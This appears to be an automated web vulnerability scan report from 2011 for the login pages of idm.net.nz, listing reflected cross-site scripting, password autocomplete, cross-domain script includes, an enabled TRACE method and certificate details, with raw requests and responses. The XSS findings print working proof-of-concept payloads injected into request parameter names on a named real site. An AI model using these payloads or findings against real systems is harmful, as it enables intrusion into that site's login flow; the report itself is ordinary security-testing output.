1. Cross-site scripting (reflected)
1.1. https://idm.net.nz/secure/ [name of an arbitrarily supplied request parameter]
1.2. https://idm.net.nz/secure/index.php [name of an arbitrarily supplied request parameter]
2. Password field with autocomplete enabled
2.1. https://idm.net.nz/secure/
2.2. https://idm.net.nz/secure/index.php
3. Cross-domain script include
3.1. https://idm.net.nz/secure/
3.2. https://idm.net.nz/secure/index.php
5.1. https://idm.net.nz/favicon.ico
5.2. https://idm.net.nz/secure/
5.3. https://idm.net.nz/secure/index.php
6. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | https://idm.net.nz |
Path: | /secure/ |
GET /secure/?d3076"><script>alert(1)< Host: idm.net.nz Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 17:42:08 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8230 <html> <head> <title>IDM Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <script src="http://ajax ...[SNIP]... <input name="Referrer" type="hidden" value="https://idm.net.nz ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://idm.net.nz |
Path: | /secure/index.php |
GET /secure/index.php?9f8a3"><script>alert(1)< Host: idm.net.nz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 17:51:40 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8239 <html> <head> <title>IDM Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <script src="http://ajax ...[SNIP]... <input name="Referrer" type="hidden" value="https://idm.net.nz ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://idm.net.nz |
Path: | /secure/ |
GET /secure/ HTTP/1.1 Host: idm.net.nz Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 17:41:47 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8184 <html> <head> <title>IDM Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <script src="http://ajax ...[SNIP]... <div style="display: block;" id="divLogin"> <form action="/secure/index.php <input type="hidden" id="detect" name="detect" value=""> ...[SNIP]... <td colspan="2" class="dataTableMainCell" style="padding: 5px 5px 5px 25px;"> <input name="password" type="password" style="width: 200px;" maxlength="8" tabindex="2"> <br> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://idm.net.nz |
Path: | /secure/index.php |
GET /secure/index.php HTTP/1.1 Host: idm.net.nz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 17:51:22 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8193 <html> <head> <title>IDM Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <script src="http://ajax ...[SNIP]... <div style="display: block;" id="divLogin"> <form action="/secure/index.php <input type="hidden" id="detect" name="detect" value=""> ...[SNIP]... <td colspan="2" class="dataTableMainCell" style="padding: 5px 5px 5px 25px;"> <input name="password" type="password" style="width: 200px;" maxlength="8" tabindex="2"> <br> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://idm.net.nz |
Path: | /secure/ |
GET /secure/ HTTP/1.1 Host: idm.net.nz Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 17:41:47 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8184 <html> <head> <title>IDM Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <script src="http://ajax ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://idm.net.nz |
Path: | /secure/index.php |
GET /secure/index.php HTTP/1.1 Host: idm.net.nz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 17:51:22 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8193 <html> <head> <title>IDM Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <script src="http://ajax ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://idm.net.nz |
Path: | / |
TRACE / HTTP/1.0 Host: idm.net.nz Cookie: fbff74e94456198d |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 17:41:49 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: idm.net.nz Cookie: fbff74e94456198d |
Severity: | Information |
Confidence: | Certain |
Host: | https://idm.net.nz |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: idm.net.nz Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 17:41:56 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Thu, 04 Aug 2005 22:39:59 GMT ETag: "1289d0-6b6-42d98dc0" Accept-Ranges: bytes Content-Length: 1718 Connection: close Content-Type: text/plain; charset=UTF-8 ..............(...&...... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://idm.net.nz |
Path: | /secure/ |
GET /secure/ HTTP/1.1 Host: idm.net.nz Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 17:41:47 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8184 <html> <head> <title>IDM Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <script src="http://ajax ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://idm.net.nz |
Path: | /secure/index.php |
GET /secure/index.php HTTP/1.1 Host: idm.net.nz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 17:51:22 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8193 <html> <head> <title>IDM Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <script src="http://ajax ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | https://idm.net.nz |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: idm.net.nz Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 17:41:56 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Thu, 04 Aug 2005 22:39:59 GMT ETag: "1289d0-6b6-42d98dc0" Accept-Ranges: bytes Content-Length: 1718 Connection: close Content-Type: text/plain; charset=UTF-8 ..............(...&...... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://idm.net.nz |
Path: | / |
Issued to: | idm.net.nz |
Issued by: | COMODO High-Assurance Secure Server CA |
Valid from: | Mon May 09 19:00:00 CDT 2011 |
Valid to: | Wed May 09 18:59:59 CDT 2012 |
Issued to: | COMODO High-Assurance Secure Server CA |
Issued by: | AddTrust External CA Root |
Valid from: | Thu Apr 15 19:00:00 CDT 2010 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |